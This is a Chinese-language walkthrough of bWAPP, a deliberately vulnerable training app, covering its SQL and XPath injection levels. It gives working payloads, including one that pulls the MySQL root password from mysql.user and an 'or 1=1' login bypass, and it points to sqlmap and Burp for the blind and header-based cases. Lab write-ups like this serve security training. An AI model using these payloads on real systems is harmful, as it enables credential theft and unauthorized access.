Bwapp漏洞平台答案全解-A1(第三篇)
0x01 A1 - Injection(第三次)
1.21-SQL Injection - Stored (Blog)
输入:test','test')#
candy','candy')#
candy',(select password from mysql.user where user='root'limit 0,1))#
candy',(select version()))#
candy',(select user()))#1.22-SQL Injection - Stored (SQLite)
用SQLmap的图形界面+burp抓包存成文件可以跑出来
-1.23-SQL Injection - Stored (User-Agent)
在User-Agent上有注入
使用sqlmap的 --risk --level 可以检测出
-1.24-SQL Injection - Stored (XML)
burp扫描出结果
-1.25-SQL Injection - Blind - Boolean-Based
SQL盲注-基于布尔
*1.26-SQL Injection - Blind - Time-Based
时间盲注,未做手工测试,可自行百度,
使用sqlmap可跑
-1.27-SQL Injection - Blind (SQLite)
SQL盲注-
-1.28-SQL Injection - Blind (WS/SOAP)
1.29-XML/XPath Injection (Login Form)
用户名:whatever' or 1=1 or'
绕过登陆
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-07-19,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
云数据库 SQL Server
腾讯云数据库 SQL Server (TencentDB for SQL Server)是业界最常用的商用数据库之一,对基于 Windows 架构的应用程序具有完美的支持。TencentDB for SQL Server 拥有微软正版授权,可持续为用户提供最新的功能,避免未授权使用软件的风险。具有即开即用、稳定可靠、安全运行、弹性扩缩等特点。
腾讯云开发者
